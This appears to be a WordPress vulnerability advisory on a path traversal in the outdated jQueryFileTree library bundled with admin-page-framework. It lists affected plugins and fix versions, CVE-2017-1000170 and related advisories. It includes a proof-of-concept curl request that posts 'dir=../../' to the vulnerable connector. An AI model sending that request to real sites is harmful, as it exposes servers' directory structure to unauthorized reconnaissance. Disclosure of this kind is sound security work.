WordPress Plugin Vulnerabilities

Folders Disclosure via Outdated jQueryFileTree Library

Description

The plugins are using the admin-page-framework framework which is shipped with the outdated and no longer maintained library jQueryFileTree known to be affected by a path traversal issue, allowing unauthenticated attackers to disclose the folder structure of the web server

Proof of Concept

curl 'https://example.com/wp-content/plugins/<affected-plugin>/<path-to-jQueryFileTree-lib>/connectors/jqueryFileTreePlus.php' -d "dir=../../" -e "xx"

e.g: curl 'https://example.com/wp-content/plugins/revision-manager-tmc/vendor/tmc/admin-page-framework/custom-field-types/path-custom-field-type/connectors/jQueryFileTreePlus.php' -d "dir=../../" -e "xx"

Affects Plugins

Plugin icon
revision-manager-tmc
Fixed in 2.8.0
Plugin icon
admin-page-framework
Fixed in 3.9.0
Plugin icon
task-scheduler
Fixed in 1.6.1
Plugin icon
better-search-tmc
No known fix
Plugin icon
faculty-weekly-schedule
Fixed in 1.2.0
Plugin icon
read-offline
No known fix

References

CVE
CVE-2017-1000170
URL
https://github.com/jqueryfiletree/jqueryfiletree/issues/66

Classification

Type
TRAVERSAL
OWASP top 10
A1: Injection
CWE
CWE-22
CVSS
5.3 (medium)

Miscellaneous

Verified
Yes
WPVDB ID
063a4a32-e813-4929-9833-b2ce197c94ae

Timeline

Publicly Published
2022-03-01 (about 2 years ago)
Added
2022-03-01 (about 2 years ago)
Last Updated
2022-04-08 (about 2 years ago)

Other

Published
Title
Published
2022-09-15
Title
SearchWP Live Ajax Search < 1.6.3 - Unauthenticated Local File Inclusion
Published
2022-10-28
Title
Ultimate Member < 2.5.1 - Contributor+ LFI via Traversal
Published
2022-07-27
Title
WordPress Team Members Showcase < 4.1.2 - Subscriber+ Arbitrary File Read and Deletion
Published
2019-02-14
Title
WP Cost Estimation < 9.660 - Upload Directory Traversal
Published
2021-02-08
Title
Backup by Supsystic <= 2.3.9 - Authenticated Arbitrary File Download and Deletion